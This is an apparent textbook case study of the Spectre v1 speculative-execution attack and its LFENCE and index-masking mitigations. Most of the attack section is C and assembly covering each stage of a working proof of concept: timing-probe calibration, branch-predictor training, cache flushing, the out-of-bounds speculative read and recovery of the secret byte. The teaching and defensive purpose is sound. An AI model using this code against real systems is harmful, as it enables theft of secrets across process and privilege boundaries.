Case Study 31-2: Spectre — How Speculative Execution Becomes a Security Vulnerability

The Attack That Changed How We Think About CPU Design

In January 2018, researchers disclosed Spectre and Meltdown — two classes of vulnerabilities that affected virtually every high-performance CPU manufactured in the previous two decades. The vulnerabilities were not bugs in the traditional sense. The CPUs were working exactly as designed. The design itself was the vulnerability.

Understanding Spectre requires understanding speculative execution. This case study traces the exact mechanism of Spectre variant 1, explains why it works, and examines the mitigations that make it expensive.

Background: The Timing Side Channel

A side channel is an observable effect of a computation that leaks information without being the computation's intended output. The primary side channel in Spectre is the cache timing channel: an attacker can determine whether a specific memory address was accessed by measuring how long it takes to access that address. A cache hit takes ~4 cycles; a cache miss takes ~100 cycles. The difference is directly measurable.

// Timing probe: measure access time to an address
uint64_t time_access(volatile uint8_t *addr) {
    uint64_t start, end;
    asm volatile("mfence; lfence");  // drain pending stores, stop earlier speculation
    asm volatile("rdtsc; shl $32, %%rdx; or %%rdx, %%rax" : "=a"(start) :: "rdx");
    volatile uint8_t temp = *addr;   // access the address
    (void)temp;
    asm volatile("lfence");          // wait for the load before reading the timer again
    asm volatile("rdtsc; shl $32, %%rdx; or %%rdx, %%rax" : "=a"(end) :: "rdx");
    return end - start;
}
// If time < 50 cycles → cache hit → address was recently accessed
// If time > 100 cycles → cache miss → address was NOT recently accessed
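The hard-coded cutoffs above vary by microarchitecture, so in practice the hit/miss threshold is calibrated at runtime. A sketch using compiler intrinsics instead of raw asm (x86-64 with GCC/Clang assumed; timed_load and calibrate_threshold are illustrative names, not part of any library):

```c
#include <stdint.h>
#include <x86intrin.h>   // __rdtsc, _mm_clflush, _mm_mfence, _mm_lfence

static uint8_t probe_line[64] __attribute__((aligned(64)));

// Intrinsics version of the probe: the fences bracket the load so the
// two timestamps measure only the access itself.
static uint64_t timed_load(volatile uint8_t *addr) {
    _mm_mfence();
    _mm_lfence();
    uint64_t start = __rdtsc();
    _mm_lfence();
    (void)*addr;                      // the access being timed
    _mm_lfence();
    uint64_t end = __rdtsc();
    return end - start;
}

// Average a warmed (hit) access and a flushed (miss) access over many
// trials, then place the cutoff halfway between the two averages.
uint64_t calibrate_threshold(void) {
    enum { TRIALS = 4096 };
    uint64_t hit = 0, miss = 0;
    for (int i = 0; i < TRIALS; i++) {
        (void)*(volatile uint8_t *)probe_line;  // warm the line: next load hits
        hit += timed_load(probe_line);
        _mm_clflush(probe_line);                // evict the line: next load misses
        _mm_mfence();
        miss += timed_load(probe_line);
    }
    return (hit / TRIALS + miss / TRIALS) / 2;
}
```

Any later probe result below the returned threshold is classified as a hit.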

The Spectre v1 Attack

The setup:

- A victim program has an array array and a size check: if (x < array_size) { ... }
- The victim also has a probe_array[256 * 64] (256 cache-line-spaced entries)
- An attacker can call the victim's function with attacker-controlled x

The vulnerable code pattern:

// victim.c
uint8_t array[256] = { /* some data */ };
uint8_t probe_array[256 * 64];
size_t array_size = 256;

// The vulnerable function:
uint8_t read_secret(size_t x) {
    if (x < array_size) {                      // bounds check
        return probe_array[array[x] * 64];     // memory access
    }
    return 0;
}

Step 1: Train the branch predictor

The attacker calls read_secret(valid_index) many times with valid indices. The branch predictor learns: "this branch is almost always taken."
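Concretely, the training phase is nothing more than repeated in-bounds calls. A sketch reusing the victim definitions above (the round count is an illustrative guess; real exploits tune it per CPU):

```c
#include <stddef.h>
#include <stdint.h>

uint8_t array[256];
uint8_t probe_array[256 * 64];
size_t array_size = 256;

uint8_t read_secret(size_t x) {                // the victim from above
    if (x < array_size)
        return probe_array[array[x] * 64];
    return 0;
}

// Mistrain the predictor: every call takes the in-bounds path, so the
// branch's history saturates toward "in bounds".
void train_predictor(int rounds) {
    for (int i = 0; i < rounds; i++)
        (void)read_secret((size_t)i % array_size);
}
```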

Step 2: Flush the probe array from cache

The attacker flushes all 256 cache lines of probe_array:

; CLFLUSH: flush a cache line
    clflush [probe_array + 0*64]
    clflush [probe_array + 1*64]
    ; ... 256 flushes total ...
    clflush [probe_array + 255*64]
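The same flush can be issued from C with the _mm_clflush intrinsic (x86 only); the fence at the end is there so the evictions complete before the next step begins:

```c
#include <stdint.h>
#include <x86intrin.h>   // _mm_clflush, _mm_mfence

uint8_t probe_array[256 * 64];

// Evict every probe slot so the timing phase in Step 4 starts from a
// known all-miss state.
void flush_probe_array(void) {
    for (int i = 0; i < 256; i++)
        _mm_clflush(&probe_array[i * 64]);
    _mm_mfence();        // do not proceed until the evictions are done
}
```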

Step 3: Speculatively read the secret

The attacker calls read_secret(x) where x is an invalid index pointing to a secret byte outside array (e.g., x = secret_ptr - &array[0]).

The CPU evaluates the branch:

1. Checks: is x < array_size?
2. Branch predictor says "YES, it is less than array_size" (from training in Step 1)
3. CPU speculatively executes probe_array[array[x] * 64] while the comparison completes
4. The speculative load reads array[x] — which is the SECRET BYTE
5. Multiplies by 64, uses as index into probe_array
6. LOADS probe_array[secret_byte * 64] — brings this cache line into the L1 cache
7. Actual comparison completes: x >= array_size is true
8. CPU SQUASHES the speculative execution: rolls back rax, rbx, etc.
9. BUT: the cache now has probe_array[secret_byte * 64] loaded. This is NOT rolled back.
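Put together, one leak attempt is a short sequence. A sketch reusing the names above (the string secret stands in for the victim's secret data; flushing array_size itself is a refinement from the original Spectre paper, since a slow bounds-check comparison widens the speculation window):

```c
#include <stddef.h>
#include <stdint.h>
#include <x86intrin.h>   // _mm_clflush, _mm_mfence

uint8_t array[256];
uint8_t probe_array[256 * 64];
size_t array_size = 256;
const char *secret = "TOP SECRET";             // stands in for the victim's secret

uint8_t read_secret(size_t x) {                // the victim from above
    if (x < array_size)
        return probe_array[array[x] * 64];
    return 0;
}

// One leak attempt against the first byte of the secret.
void attack_round(void) {
    size_t malicious_x = (size_t)((const uint8_t *)secret - array);
    for (int i = 0; i < 30; i++)               // Step 1: train the predictor
        (void)read_secret((size_t)i % array_size);
    for (int i = 0; i < 256; i++)              // Step 2: flush the probe slots
        _mm_clflush(&probe_array[i * 64]);
    _mm_clflush(&array_size);                  // slow the bounds check down,
    _mm_mfence();                              // widening the speculation window
    (void)read_secret(malicious_x);            // Step 3: the speculative read
}
```

Architecturally the out-of-bounds call returns 0; only the cache state differs afterward.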

Step 4: Extract the secret via cache timing

// Attacker probes each entry:
uint8_t secret = 0;
uint64_t min_time = UINT64_MAX;
for (int i = 0; i < 256; i++) {
    uint64_t t = time_access(&probe_array[i * 64]);
    if (t < min_time) {   // fastest access seen so far
        min_time = t;
        secret = i;       // best candidate for the secret byte value
    }
}
// A min_time under ~50 cycles confirms the winner really was a cache hit.

One probe array entry is in cache; the others are not. The fast access reveals which value array[x] had — the secret byte.
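A single probe pass is also noisy, and scanning the slots in ascending order can trigger the stride prefetcher and pollute the measurement (the original Spectre proof of concept visits the slots in a permuted order for this reason). Real exploits therefore repeat the whole train/flush/probe cycle many times, tally a score per candidate value, and take the highest scorer. That tallying step is plain C (best_guess is an illustrative name):

```c
// score[v] counts, across many repeated attack rounds, how often probing
// slot v came back under the cache-hit threshold. The most-hit value is
// the best guess for the secret byte.
int best_guess(const int score[256]) {
    int best = 0;
    for (int v = 1; v < 256; v++)
        if (score[v] > score[best])
            best = v;
    return best;
}
```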

The Attack in Assembly

; Spectre gadget (what the CPU executes speculatively):
; rbx = x (attacker-controlled, out-of-bounds)
; rsi = array base
; r8 = probe_array base
;
; Before getting here: bounds check predicted "in bounds" (out of bounds in reality)

    movzx rax, byte [rsi + rbx]     ; load array[x] → rax (secret byte)
    shl   rax, 6                     ; multiply by 64 (cache line size)
    movzx rax, byte [r8 + rax]      ; load probe_array[secret * 64]
    ; This last load brings one cache line into cache.
    ; When the CPU squashes this (bounds check failed),
    ; everything is rolled back EXCEPT the cache state.

The Mitigation: LFENCE

; Mitigated version:
    cmp rbx, array_size
    jae .out_of_bounds
    lfence                   ; SERIALIZE: nothing executes speculatively past here
    movzx rax, byte [rsi + rbx]    ; now this is safe: no speculation
    ; ... rest of code ...

LFENCE acts as a speculation barrier: it does not execute until every prior instruction has completed, and no later instruction begins executing, even speculatively, until LFENCE itself completes. This breaks the attack: the load of array[x] cannot issue until the bounds check has resolved, so a mispredicted branch never reaches the secret.
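LFENCE is not the only option. The Linux kernel's array_index_nospec() takes a different approach: branchless index masking. Compute a mask that is all-ones when the index is in bounds and zero otherwise, with no branch for the predictor to mistrain. A simplified sketch of the idea (assumes sizes below INTPTR_MAX and an arithmetic right shift on negative values, which GCC and Clang guarantee on x86-64):

```c
#include <stddef.h>
#include <stdint.h>

// All-ones when x < size, zero otherwise, computed with no branch --
// so there is nothing for the predictor to mistrain. If x < size, the
// subtraction wraps negative and the arithmetic shift smears the sign
// bit into all ones; otherwise the shift yields zero.
static inline size_t index_mask(size_t x, size_t size) {
    return (size_t)((intptr_t)(x - size) >> (sizeof(size_t) * 8 - 1));
}

uint8_t array[256];
uint8_t probe_array[256 * 64];
size_t array_size = 256;

uint8_t read_secret_masked(size_t x) {
    if (x < array_size) {
        x &= index_mask(x, array_size);    // out-of-bounds x becomes 0,
        return probe_array[array[x] * 64]; // even under misspeculation
    }
    return 0;
}
```

Architecturally nothing changes for valid indices; under misspeculation an out-of-bounds x is clamped to 0, so array[x] can never read the secret. Masking is usually cheaper than LFENCE because it does not stall the pipeline.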

The Cost

Without LFENCE (vulnerable):
  100 million calls to read_secret: 312 ms

With LFENCE (mitigated):
  100 million calls to read_secret: 389 ms

Overhead: 24.7%

This 25% overhead is why Spectre mitigations are contentious. For a web browser's JavaScript JIT compiler, which generates code for untrusted JavaScript and needs bounds checks on every array access, the LFENCE overhead can be significant. For system calls — which require LFENCE at the kernel entry point to prevent speculation from kernel memory into user space — the overhead is measurable in every syscall-heavy workload.

Broader Lessons

Spectre changed the fundamental contract of CPU performance optimization:

Before Spectre: Speculative execution is invisible. The programmer sees only sequential execution semantics. Performance optimizations that use speculation are free.

After Spectre: Speculation is visible through side channels. Any computation that happens speculatively can leak information, even if it is architecturally squashed. Security-sensitive code must explicitly limit speculation (LFENCE, serializing instructions) at security boundaries.

The performance cost of Spectre mitigations is a permanent tax on every system call, every privileged operation, every execution across a security boundary. Modern CPUs now include hardware mitigations that reduce (but do not eliminate) this tax — but the fundamental tension between performance and security remains. Speculative execution will continue to create new variants as long as CPUs speculate, and mitigations will continue to cost performance.

🔐 Security Note: Spectre affects not just operating systems but any software that executes code from multiple security domains: web browsers (JavaScript execution), virtual machines (guest code), and JIT compilers. Google's Chromium browser deployed site isolation (separate processes per site) partly in response to Spectre, accepting significant memory overhead to eliminate the cross-origin speculative access risk.